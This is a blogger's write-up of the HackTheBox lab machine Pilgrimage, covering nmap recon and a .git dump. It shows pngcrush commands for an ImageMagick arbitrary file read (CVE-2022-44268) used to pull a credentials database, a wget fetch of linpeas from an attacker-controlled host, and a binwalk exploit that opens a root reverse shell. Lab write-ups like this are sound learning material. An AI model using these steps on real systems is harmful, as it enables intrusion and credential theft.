Pilgrimage — HTB Machine

Rishabh Rai
7 min readJan 5, 2024

I am presenting my new write-up on an machine named Pilgrimage on HTB. Let’s spwan the machine and get started…..

We have the IP, now i will do basic initial recon using nmap, I will write a script to do this form me soon stay tuned to see that as well.

In that scrip i will try to automate majorly three commands of NMAP on an IP

— — one big documentation scan that i do ..
— then two small scans including
— — — — — — — — — without -p-
— — — — — — — — — with -p- — min-rate 1000

That’s enough off topic for today lets connect the vpn and run the nmap scan.

full fledged documentation scan

*note
you can also save time sometime by doing
nmap <IP> -p- — min-rate 1000 first and then noting down the open ports and use those ports in the bigger scan command.

simple ports are open

Okay so one http and one ssh port is open

BY default we can’t login to ssh so we will go to http port and analyse it first..
before that lets add the domain pilgrimage.htb and associate it with the IP we have been provided.

to do that just nano /etc/hosts and then add the format
| <IP> hostname

Upon visiting http://pilgrimage.htb we are greeted with a image shrinking web page

To start with I register with user: test and pass: test and i get this as the site says that create a account to save the image meaning I might be able to upload a malicious image and get a reverse shell.

Upon seeing a web server first instinct is to do an dir search to find anything useful which may have been left behind by the devs.
To do so I started a dirsearch on the url “http://pilgrimage.htb”

And found something interesting which was a .git directory

I tried accessing it but no luck there ….

So I turned to google to help me with the situation and i stumbled upon a dumping tool for git…

at first glance there is a binary file named magick.

Upon searching i came across some exploit but to identify the right one we have to check the version of the magick file

One exploit link seemd promising
https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

Upon followign the steps in PoC I got this ->

note: emily is a user

So we have a sort of LFI here but we have to scale it to something useful so that we can have a foothold on the machine…..

upon reading this php file we undetsand that they take .png files and store them in tmp folder and then they use magick to conver it and shirnk it to its 50% size and then save it in the folder …/tmp.
There is also a SQL database session and connection so we must focus here as it shows a directory path to a file which we maybe able to read.

let’s try reading it I will show you the way it is also mentioned in PoC…
first i downloaded a png file form the browser and then it is pretty simple commands:
>>> pngcrush -text a “profile” “<file name which you want to read>” <png file name>
>>>exiv2 -pS pngout.png

>>>now let us upload this file

>>>identify -verbose <downloaded png>

SInce it was long data i found a way to automate this step …

>>> dump the data in a file using echo, vim or nano
>>>tr -d ‘/n’ < <filename>

It was so long it broke my editor

upon trying several times it became impossible to do manually hence had to take an scripting approach to this…

First i tried a bash script but it was not working for me so i thought of using a python script which was :

with open(“<file with hex data>”, “rb”) as f:

data = bytes.fromhex(f.read().decode())

with open(“file.db”, “wb”) as f:

f.write(data)

after running the script you will have a file name file.db

then run a command to fetch details form the data base:

sqlite3 file.db

Usign these creds we can login to the server and now we have foothold on the machine……

after getting the user.txt, It was time to find something to escalate our privilege

So i fired up http server and transferred linpeas.sh to the machine to have a good look into the machine

At victim machine:

wget http://<IP>/path to file

while going through all the red colours — —
I noticed something interesting
Have a look on image and try to find the anomaly….

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

many many seconds/minutes/hours later……….

/usr/sbin/malwarescan.sh — — THIS FILE IS suspicious as it is running with root privilege

So this script is checking …../pilgrimage.htb/shrunk for any so called malware strings with the help of binwalk and if there is any match it will delete the file

After searching a lot of way i analyzed the binwalk and found its exploit on web….

https://www.exploit-db.com/exploits/51249

Let’s follow the exploit and i am using the same png i used earlier for foothold.

now we have out malicious png file made for us just have to upload it by doing wget on victim’s machine

The reverse shell is finally spawned ….. just have to get the root.txt by simply doing

cat /root/root.txt
{redacted}

My Review:

THIS WAS A FUN ROOM, had to check linpeas.sh twice …. Other than that root flag took time as i didn’t go for binwalk from the start i thought there might be some other way……. and last but not least, the hex value part lagged my applications and vm together which was tough to figure out ….

Join me on various platforms to discuss Cybersecurity and Cloud-related topics. From security best practices to cloud infrastructure, let’s exchange ideas and insights and stay ahead of the curve..

CONNECT WITH ME 🔗💻

--

--

Rishabh Rai

4th year student exploring the world of cyber security with a knack for writing and always learning.